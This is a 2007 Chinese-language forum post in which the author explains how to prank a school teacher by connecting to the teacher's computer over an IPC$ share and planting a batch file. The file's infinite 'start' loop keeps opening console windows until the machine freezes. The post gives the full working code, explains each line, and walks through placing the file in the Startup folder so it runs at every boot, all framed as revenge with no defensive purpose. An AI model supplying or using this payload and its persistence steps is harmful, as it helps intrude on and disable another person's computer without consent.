无敌整人批处理

0 views
Skip to first unread message

李校尉

unread,
Dec 14, 2007, 11:25:02 PM12/14/07
to wic...@googlegroups.com
HELLO EVERYONE!
偶 小落!
今天想整整我们学校的老师!用IPC$连上了之后手头没什么整人软件!所以..用批处理做一个!很爽的!HOHO..老师一开机就狂弹DOS窗口,一直弹到死机!~(内存都满了~~~~)
想知道怎么做嘛..跟我学吧!


用IPC$连接上某主机,这不用我说了吧..如果你连不上..就用别的方法吧!反正达到目的就行!
然后在你自己的桌面上新建一个文本文档!就是txt格式的文件(我又说这么多了!..咦!?...我为什么要说又字!)
然后打开它!在里面输入:
@ECHO OFF
:1
start
goto 1
这几句的是什么意思呢..待我慢慢道来!(某肌肉男:呸你丫的,还唱起戏来了!)
@的意思就是它后面的命令不会显示出来!就是没有回显!
echo off的意思就是以下的命令全部没有回显.
:1和goto 1是一体的!
就是说当系统读到goto的时候就跳到它后面所指的数字那里!这样反复循环,反复循环,反复循环!(也就是死
循环)!
start的意思就是再打开一个DOS窗口!
说到这里,我相信大家都懂了吧!
然后把这些保存为.bat格式的文件!
然后放到老师机子一个"拐弯抹角"的地方!然后放到开始菜单里的程序下的启动里!
什么?.你不会?..我K!
你点住这个文件然后拖到开始按钮上!(不要放)
然后等开始菜单出来以后再拖到程序上!然后再拖到启动里!松开就可以了!
这样老师一开机子就会弹出无数个DOS窗口!爽死他!OH 耶!
同志们表骂我不是人啊~~~~~我们老师太BT了..嘿嘿...
最后B4一下看贴不回贴的家伙!看贴不会贴!我用舌头拍死你丫的!
Reply all
Reply to author
Forward
0 new messages